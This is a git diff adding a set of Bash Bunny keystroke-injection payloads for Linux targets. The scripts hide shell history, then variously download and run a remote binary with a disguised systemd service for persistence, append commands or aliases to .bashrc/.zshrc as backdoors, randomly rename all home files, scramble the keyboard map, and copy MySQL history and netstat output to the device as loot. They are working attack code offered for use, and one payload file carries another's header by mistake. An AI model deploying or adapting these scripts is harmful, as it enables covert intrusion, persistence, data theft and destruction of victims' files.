diff --git a/payloads/extensions/browser_exec.sh b/payloads/extensions/browser_exec.sh new file mode 100644 index 000000000..6b8bdc145 --- /dev/null +++ b/payloads/extensions/browser_exec.sh @@ -0,0 +1,24 @@ +#!/bin/bash + +# BROWSER_EXEC v1 by @drapl0n +# BROWSER_EXEC finds browser installed in target's system and searche for URL in it. +# Usage: BROWSER_EXEC + +function BROWSER_EXEC(){ + LED ATTACK + Q DELAY 1000 + Q CTRL-ALT t + Q DELAY 1000 + Q STRING unset HISTFILE + Q ENTER + Q DELAY 200 + Q STRING echo -e "\"#\!/bin/bash\nfunction browser(){\n\tbrowser=\\\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \\\"\\\$browser\\\" = firefox ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --private-window)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = chromium ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = brave ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \\\"Browser not found.\\\"\n\tfi\n}\nbrowser\n\\\$execBrowser $1 "\" \> /tmp/sys + Q ENTER + Q DELAY 200 + Q STRING chmod +x /tmp/sys + Q ENTER + Q DELAY 200 + Q STRING /tmp/./sys \& disown \&\& exit + Q ENTER +} +export -f BROWSER_EXEC $1 diff --git a/payloads/extensions/capslock_disable.sh b/payloads/extensions/capslock_disable.sh new file mode 100644 index 000000000..5a3b896e5 --- /dev/null +++ b/payloads/extensions/capslock_disable.sh @@ -0,0 +1,16 @@ +#!/bin/sh +# +# CAPSLOCK_DISABLE v1 by @drapl0n +# Disables CapsLock on target's system. +# Usage: CAPSLOCK_DISABLE ----------------------------(to disable CAPSLOCK on target's system.) + +function CAPSLOCK_DISABLE() { + Q DELAY 200 + Q CTRL-ALT t + Q DELAY 1000 + Q STRING setxkbmap -option ctrl:nocaps \&\& exit + Q ENTER + Q DELAY 200 +} + +export -f CAPSLOCK_DISABLE diff --git a/payloads/extensions/shell_trigger.sh b/payloads/extensions/shell_trigger.sh new file mode 100644 index 000000000..313c7fd22 --- /dev/null +++ b/payloads/extensions/shell_trigger.sh @@ -0,0 +1,23 @@ +#!/bin/bash + +# SHELL_TRIGGER v1 by @drapl0n +# SHELL_TRIGGER triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator. +# Usage: SHELL_TRIGGER +function SHELL_TRIGGER(){ + LED ATTACK + Q DELAY 1000 + Q CTRL-ALT t + Q DELAY 1000 + Q STRING unset HISTFILE + Q ENTER + Q DELAY 200 + Q STRING echo -e "\"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \\\"$1\\\" >> ~/.zshrc\\\nfi\\\n\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \\\"$1\\\" >> ~/.bashrc\\\nfi"\" \> /tmp/sys + Q ENTER + Q DELAY 200 + Q STRING chmod +x /tmp/sys + Q ENTER + Q DELAY 200 + Q STRING /tmp/./sys + Q ENTER +} +export -f SHELL_TRIGGER $1 diff --git a/payloads/library/execution/BROWSER_EXEC_DEMO/README.md b/payloads/library/execution/BROWSER_EXEC_DEMO/README.md new file mode 100644 index 000000000..53bbdfb30 --- /dev/null +++ b/payloads/library/execution/BROWSER_EXEC_DEMO/README.md @@ -0,0 +1,33 @@ +## About: +# Title: BROWSER_EXEC_DEMO +# Description: BROWSER_EXEC_DEMO finds browser installed in target's system and searche URL in it. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution. +# Target: Unix-like operating systems. +# Attackmodes: HID + +## BROWSER_EXEC_DEMO: A payload which finds installed browser in target's system and searche URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it. + +### Workflow: +1. Executing Terminal Emulator. +2. Prevent storing history. +3. Storing script in target's system. +4. Granting execution privilege. +5. Executing script in background. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | --------------------------------| +| payload.txt | /payloads/switch1/ | + +### Changes to be done: +* Replace URL on line `27` to the URL which you want your target system to visit. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/BROWSER_EXEC_DEMO/payload.txt b/payloads/library/execution/BROWSER_EXEC_DEMO/payload.txt new file mode 100644 index 000000000..dc9b708e5 --- /dev/null +++ b/payloads/library/execution/BROWSER_EXEC_DEMO/payload.txt @@ -0,0 +1,29 @@ +# Title: BROWSER_EXEC_DEMO +# Description: This payload demonstrates functioning of extension BROWSER_EXEC which finds browsers installed in target's system and searches URL in it. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution. +# Target: Unix-like operating systems. +# Attackmodes: HID + +# [Setting up Bunny] +LED SETUP +ATTACKMODE HID + +# [Launching Terminal Emulator] +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Executing Main Payload] + +# [Note: Replace URL below to the URL which you want your target system to visit.] +BROWSER_EXEC hak5.org + +LED FINISH diff --git a/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/README.md b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/README.md new file mode 100644 index 000000000..7dfb2ddbb --- /dev/null +++ b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/README.md @@ -0,0 +1,19 @@ +## About +# Title: CAPSLOCK_DISABLE_DEMO +# Description: CAPSLOCK_DISABLES_DEMO disables capslock on target's system. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux. +# Attackmodes: HID. + +## CAPSLOCK_DISABLES_DEMO: CAPSLOCK_DISABLES_DEMO disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute. + +### Workflow: +1. Executing Terminal Emulator. +2. Prevent storing history. +3. Executing command which disables capslock. +4. Terminating terminal instance. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/payload.txt b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/payload.txt new file mode 100644 index 000000000..4b900ce14 --- /dev/null +++ b/payloads/library/execution/CAPSLOCK_DISABLE_DEMO/payload.txt @@ -0,0 +1,23 @@ +# Title: CAPSLOCK_DISABLE_DEMO +# Description: Demonstration of CAPSLOCK_DISABLE extension. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux. +# Attackmodes: HID. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Calling Extension] +CAPSLOCK_DISABLE diff --git a/payloads/library/execution/SHELL_TRIGGER_DEMO/README.md b/payloads/library/execution/SHELL_TRIGGER_DEMO/README.md new file mode 100644 index 000000000..05cbd452a --- /dev/null +++ b/payloads/library/execution/SHELL_TRIGGER_DEMO/README.md @@ -0,0 +1,33 @@ +## About: +# Title: SHELL_TRIGGER_DEMO +# Description: SHELL_TRIGGER_DEMO payload demonstrates working of SHELL_TRIGGER extension. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution. +# Target: Unix-like operating systems. +# Attackmodes: HID + +## SHELL_TRIGGER: SHELL_TRIGGER is an extension which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator. + +### Workflow: +1. Executing Terminal Emulator. +2. Prevent storing history. +3. Storing script in target's system. +4. Granting execution privilege. +5. Executing script in background. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | --------------------------------| +| payload.txt | /payloads/switch1/ | + +### Changes to be made: +* Replace command on line `7` to the command/script which you want your target system to execute on shell execution. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/SHELL_TRIGGER_DEMO/payload.txt b/payloads/library/execution/SHELL_TRIGGER_DEMO/payload.txt new file mode 100644 index 000000000..daf00cf9d --- /dev/null +++ b/payloads/library/execution/SHELL_TRIGGER_DEMO/payload.txt @@ -0,0 +1,29 @@ +# Title: SHELL_TRIGGER_DEMO +# Description: This payload demonstrates working of SHELL_TRIGGER extension. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution. +# Target: Unix-like operating systems. +# Attackmodes: HID + +# [Setting up Bunny] +LED SETUP +ATTACKMODE HID + +# [Launching Terminal Emulator] +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Executing Main Payload] + +# [Note: Replace command below to the command/script which you want your target system to execute on shell execution.] +SHELL_TRIGGER "echo SHELL_TRIGGER extension DEMO" + +LED FINISH diff --git a/payloads/library/execution/keyboard_hangover/README.md b/payloads/library/execution/keyboard_hangover/README.md new file mode 100644 index 000000000..d83658ecd --- /dev/null +++ b/payloads/library/execution/keyboard_hangover/README.md @@ -0,0 +1,34 @@ +## About: +* Title: keyboard_hangover +* Description: keyboard_hangover is a powerful payload which randomly remaps target's keyboard. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution. +* Target: Unix-like operating systems. +* Attackmodes: HID, Storage. + +## keyboard_hangover: keyboard_hangover is a powerful payload which randomly remaps target's keyboard and and auto-triggers it. + +### Features: +1. Randomly remaps keyboard. +2. Auto-Triggers on shell execution. +3. Persistent payload. +4. Fast execution. + +### Workflow: +1. Prevent storing history. +2. Fetching BashBunny's block device. +3. Mounting BashBunny. +4. Executing Payload Script. +5. Unmounting BashBunny. + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | --------------------------------------| +| payload.txt | /payloads/switch1/ | +| payload.sh | /payloads/library/keyboard_hangover/ | + +* Note: Create directory named `keyboard_hangover` in `/payloads/library/` + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/keyboard_hangover/payload.sh b/payloads/library/execution/keyboard_hangover/payload.sh new file mode 100644 index 000000000..09194be99 --- /dev/null +++ b/payloads/library/execution/keyboard_hangover/payload.sh @@ -0,0 +1,24 @@ +#!/bin/bash + +mapping_file="/var/tmp/sys" + +keycodes=($(seq 8 255)) +characters=($(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 1 | head -n ${#keycodes[@]})) + +mapping_content="" +for ((i=0; i<${#keycodes[@]}; i++)); do + keycode=${keycodes[i]} + char=${characters[i]} + mapping_content+="keycode $keycode = $char\n" +done + +echo -e $mapping_content > $mapping_file + +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo "xmodmap /var/tmp/sys" >> ~/.zshrc +fi +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo "xmodmap /var/tmp/sys" >> ~/.bashrc +fi diff --git a/payloads/library/execution/keyboard_hangover/payload.txt b/payloads/library/execution/keyboard_hangover/payload.txt new file mode 100644 index 000000000..966c4730c --- /dev/null +++ b/payloads/library/execution/keyboard_hangover/payload.txt @@ -0,0 +1,53 @@ +# Title: keyboard_hangover +# Description: keyboard_hangover is a powerful payload which randomly remaps targets keyboard. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution. +# Target: GNU/Linux. +# Attackmodes: HID. + +LED SETUP +ATTACKMODE STORAGE +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' +Q ENTER +Q DELAY 2000 +Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$lmnt'/payloads/library/keyboard_hangover/payload.sh /tmp/system +Q ENTER +Q STRING chmod +x /tmp/system +Q ENTER +Q STRING /tmp/./system +Q ENTER +Q DELAY 300 +Q STRING rm /tmp/system +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +#Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/malware_exec/README.md b/payloads/library/execution/malware_exec/README.md new file mode 100644 index 000000000..3da3f104d --- /dev/null +++ b/payloads/library/execution/malware_exec/README.md @@ -0,0 +1,45 @@ +## About: +* Title: malware_exec +* Description: malware_exec fetches malware hosted on Internet and executes it on targets system. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Exfiltaration +* Target: Unix-like operating systems . +* Attackmodes: HID, Storage + +## malware_exec: malware_exec fetches malware hosted on Internet and executes it on targets system making it autorun on shell execution and persistent without root privileges. + +### Features: + +* Executes Malware. +* Trigger malware on shell execution/autorun malware on shell execution. +* Persistent Malware. +* No root privileges required. + +### Workflow: +1. Prevent storing history. +2. Fetching BashBunny's block device. +3. Mounting BashBunny. +4. Executing Malware. +5. Making malware autorun and persistent (optional). +5. Unmounting BashBunny. + +### Usage: +* Change Testing URL on line `36` to your custom URL. +* Uncomment line `46` to `56` to make malware persistent and autorun it on shell execution. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | --------------------------------| +| payload.txt | /payloads/switch1/ | +| payload.sh | /payloads/library/malware_exec/ | + +* Note: Create directory named `malware_exec` in `/payloads/library/` + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/malware_exec/payload.sh b/payloads/library/execution/malware_exec/payload.sh new file mode 100644 index 000000000..80c38c262 --- /dev/null +++ b/payloads/library/execution/malware_exec/payload.sh @@ -0,0 +1,8 @@ +#!/bin/sh +mkdir /var/tmp/.system +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sys -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=defaulr.target" > ~/.config/systemd/user/systemBUS.service +echo -e "ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > /tmp/tmmmp +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +chmod +x /tmp/tmmmp && cd ~/ && /tmp/tmmmp && rm /tmp/tmmmp diff --git a/payloads/library/execution/malware_exec/payload.txt b/payloads/library/execution/malware_exec/payload.txt new file mode 100644 index 000000000..0ebca3f67 --- /dev/null +++ b/payloads/library/execution/malware_exec/payload.txt @@ -0,0 +1,68 @@ +# Title: malware_exec +# Description: malware_exec fetches malware hosted on Internet and executes it on targets system. malware_exec can make malware persistent and can autorun. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution +# Target: GNU/Linux. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' +Q ENTER +Q DELAY 2000 +Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [Fetching malware] +Q STRING url=https://raw.githubusercontent.com/drapl0n/temp/main/malware_exec +Q ENTER +Q DELAY 200 +#Q STRING mkdir -p /var/tmp/.system/ \&\& wget '$url' -O /var/tmp/.system/sys +Q ENTER +# [change delay time below according to file size] +Q DELAY 5000 +Q STRING chmod +x /var/tmp/.system/sys +Q ENTER + +# [transfering payload script] +# Q STRING cp -r '$lmnt'/payloads/library/malware_exec/payload.sh /tmp/ +# Q ENTER +# Q STRING chmod +x /tmp/payload.sh +# Q ENTER +# Q STRING /tmp/./payload.sh +# Q ENTER +# Q DELAY 1500 +# Q STRING rm /tmp/payload.sh +# Q ENTER +# Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 + +# [Executing Malware] +Q DELAY 100 +Q STRING /var/tmp/.system/./sys /&/& exit +Q ENTER + +LED FINISH diff --git a/payloads/library/execution/rename_entropy/README.md b/payloads/library/execution/rename_entropy/README.md new file mode 100644 index 000000000..0522c9f5e --- /dev/null +++ b/payloads/library/execution/rename_entropy/README.md @@ -0,0 +1,36 @@ +## About: +* Title: rename_entropy +* Description: rename_entropy is a powerful payload which renames target files with extensions. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution. +* Target: Unix-like operating systems. +* Attackmodes: HID, Storage. + +## rename_entropy: rename_entropy is a powerful payload which renames target files with extensions. + +### Workflow: +1. Prevent storing history. +2. Fetching BashBunny's block device. +3. Mounting BashBunny. +4. Executing Payload Script. +5. Unmounting BashBunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------------| +| payload.txt | /payloads/switch1/ | +| payload.sh | /payloads/library/rename_entropy/ | + +* Note: Create directory named `rename_entropy` in `/payloads/library/` + +### Changes which can be made: +* You can change location of renaming files and directories at line `2` in `payload.sh` (Default location ~/home/). + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/rename_entropy/payload.sh b/payloads/library/execution/rename_entropy/payload.sh new file mode 100644 index 000000000..acfad4957 --- /dev/null +++ b/payloads/library/execution/rename_entropy/payload.sh @@ -0,0 +1,8 @@ +#!/bin/bash +dir="/home/$(whoami)/" +cd "$dir" || exit +for file in *; do + rand_str=$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 10 | head -n 1) + rand_ext=$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 3 | head -n 1) + mv "$file" "${rand_str}.${rand_ext}" +done diff --git a/payloads/library/execution/rename_entropy/payload.txt b/payloads/library/execution/rename_entropy/payload.txt new file mode 100644 index 000000000..6886e4a18 --- /dev/null +++ b/payloads/library/execution/rename_entropy/payload.txt @@ -0,0 +1,53 @@ +# Title: swap_jack +# Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target’s system. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution. +# Target: GNU/Linux. +# Attackmodes: HID, STORAGE. + +LED SETUP +ATTACKMODE STORAGE +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' +Q ENTER +Q DELAY 2000 +Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$lmnt'/payloads/library/rename_entropy/payload.sh /tmp/system +Q ENTER +Q STRING chmod +x /tmp/system +Q ENTER +Q STRING /tmp/./system +Q ENTER +Q DELAY 300 +Q STRING rm /tmp/system +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/execution/swap_jack/README.md b/payloads/library/execution/swap_jack/README.md new file mode 100644 index 000000000..24d0ca9fb --- /dev/null +++ b/payloads/library/execution/swap_jack/README.md @@ -0,0 +1,45 @@ +## About: +* Title: swap_jack +* Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target's system. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution. +* Target: Unix-like operating systems. +* Attackmodes: HID, Storage. + +## swap_jack: Simple yet Powerful payload which can be used to replace one command with another on target’s system. swap_jack gives your target ability to trigger backdoors for you. + +### Features: +1. Swap commands/Execute scripts covertly. +2. Persistent. +3. Can swap multiple commands. +4. Makes your target run commands/script for you. + +### Workflow: +1. Prevent storing history. +2. Fetching BashBunny's block device. +3. Mounting BashBunny. +4. Executing Payload Script. +5. Unmounting BashBunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Usage: +* To swap custom commands make following changes at line `2` in `payload.sh`: +* Default swaped commands: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"'`. +* Example: Swapping `pwd` command with `find`: +* Add entry seperated by `\\n` to the line `2`: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"' \\n alias pwd=\"find\"` + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| payload.sh | /payloads/library/swap_jack/ | + +* Note: Create directory named `swap_jack` in `/payloads/library/` + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/swap_jack/payload.sh b/payloads/library/execution/swap_jack/payload.sh new file mode 100644 index 000000000..ba6d0b85c --- /dev/null +++ b/payloads/library/execution/swap_jack/payload.sh @@ -0,0 +1,6 @@ +#!/bin/sh +swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"' + +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$swap_array\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$swap_array\" >> ~/.bashrc\nfi" > /tmp/tmmmp + +chmod +x /tmp/tmmmp && cd ~/ && /tmp/tmmmp && rm /tmp/tmmmp && exit diff --git a/payloads/library/execution/swap_jack/payload.txt b/payloads/library/execution/swap_jack/payload.txt new file mode 100644 index 000000000..1bc85ab53 --- /dev/null +++ b/payloads/library/execution/swap_jack/payload.txt @@ -0,0 +1,53 @@ +# Title: swap_jack +# Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target’s system. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Execution. +# Target: GNU/Linux. +# Attackmodes: HID, STORAGE. + +LED SETUP +ATTACKMODE STORAGE +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' +Q ENTER +Q DELAY 2000 +Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$lmnt'/payloads/library/swap_jack/payload.sh /tmp/system +Q ENTER +Q STRING chmod +x /tmp/system +Q ENTER +Q STRING /tmp/./system +Q ENTER +Q DELAY 300 +Q STRING rm /tmp/system +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +#Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/mysql_dump/README.md b/payloads/library/exfiltration/mysql_dump/README.md new file mode 100644 index 000000000..4a91a7d77 --- /dev/null +++ b/payloads/library/exfiltration/mysql_dump/README.md @@ -0,0 +1,33 @@ +## About: +* Title: mysql_dump +* Description: mysql_dump, a payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Exfiltaration +* Target: Unix-like operating systems. +* Attackmodes: HID, Storage + +## mysql_dump: mysql_dump payload exfiltrates MySQL history, which can be used to understand targets database schema.. + +### Workflow: +1. Prevent storing history. +2. Fetching BashBunny's block device. +3. Mounting BashBunny. +4. Looting mysql_history keys. +5. Unmounting BashBunny. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| payload.sh | /payloads/library/mysql_dump/ | + +* Note: Create directory named `mysql_dump` in `/payloads/library/` + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/exfiltration/mysql_dump/payload.sh b/payloads/library/exfiltration/mysql_dump/payload.sh new file mode 100644 index 000000000..2d1497889 --- /dev/null +++ b/payloads/library/exfiltration/mysql_dump/payload.sh @@ -0,0 +1,7 @@ +#!/bin/sh +disk=$(lsblk -fs | grep BashBunny | awk '{print $1}') +lmnt=$(lsblk | grep $disk | awk '{print $7}') +ls -a ~/ | grep -w '.mysql_history' &> /dev/null +if [ $? = 0 ]; then + cp -r ~/.mysql_history $lmnt/loot/$(whoami)-mysql_history.txt +fi diff --git a/payloads/library/exfiltration/mysql_dump/payload.txt b/payloads/library/exfiltration/mysql_dump/payload.txt new file mode 100644 index 000000000..56779a323 --- /dev/null +++ b/payloads/library/exfiltration/mysql_dump/payload.txt @@ -0,0 +1,53 @@ +# Title: mysql_dump +# Description: mysql_dump, a payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltaration. +# Target: GNU/Linux. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' +Q ENTER +Q DELAY 2000 +Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$lmnt'/payloads/library/mysql_dump/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 1500 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/network_surveillance/README.md b/payloads/library/exfiltration/network_surveillance/README.md new file mode 100644 index 000000000..6b986e6da --- /dev/null +++ b/payloads/library/exfiltration/network_surveillance/README.md @@ -0,0 +1,22 @@ +## About: +* Title: network_surveillance +* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Exfiltaration +* Target: Unix-like operating systems. +* Attackmodes: HID. + +## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. + +### Workflow: +1. Mounting Bunny. +2. Executing Terminal Emulator. +3. Prevent storing history. +4. Storing script in target’s system +5. Granting execution privilege. +6. Transferring loot. +7. Unmounting Bunny. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/exfiltration/network_surveillance/payload.txt b/payloads/library/exfiltration/network_surveillance/payload.txt new file mode 100644 index 000000000..c0081c4a4 --- /dev/null +++ b/payloads/library/exfiltration/network_surveillance/payload.txt @@ -0,0 +1,46 @@ +# Title: network_surveillance +# Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltration. +# Target: GNU/Linux. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' +Q ENTER +Q DELAY 2000 +Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [Looting] +Q STRING netstat -antup \>\> '$lmnt/loot/$(whoami)-network_surveillance' \&\& netstat -nlp \>\> '$lmnt/loot/$(whoami)-network_surveillance' +Q ENTER +Q DELAY 1000 + +# 